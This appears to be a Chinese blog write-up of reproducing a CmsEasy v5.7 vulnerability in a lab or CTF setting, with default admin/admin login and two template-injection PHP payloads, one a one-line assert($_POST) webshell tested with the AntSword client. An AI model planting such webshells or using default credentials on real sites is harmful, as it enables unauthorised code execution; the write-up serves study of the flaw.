【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

1111111111";}<?php phpinfo()?>

payload2:

11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
胡楚昊1 分钟前
攻防世界PWN刷题笔记(引导模式)1-3
笔记
上等猿21 分钟前
Ajax笔记
前端·笔记·ajax
群联云防护小杜21 分钟前
服务器被攻击怎么办
运维·服务器·网络·网络协议·安全·web安全
利哥AI实例探险31 分钟前
建筑工地AI安全检测系统:YOLO11数据标注训练与PyQt5界面设计应用开发
人工智能·qt·安全
安胜ANSCEN41 分钟前
数据流动背后的“暗流涌动”,企业如何借助多源威胁检测响应高效捕捉安全威胁?
安全
lmxnsI1 小时前
docker使用笔记
笔记·docker·容器
lijiachang0307181 小时前
设计模式(一):单例模式
c++·笔记·学习·程序人生·单例模式·设计模式·大学生
Hacker_Oldv2 小时前
网络安全攻防学习平台 - 基础关
网络·学习·web安全
raysync8882 小时前
替代传统FTP传输,镭速大数据传输系统实现安全高效数据流转!
开发语言·安全·php
Suwg2092 小时前
《手写Mybatis渐进式源码实践》实践笔记(第七章 SQL执行器的创建和使用)
java·数据库·笔记·后端·sql·mybatis·模板方法模式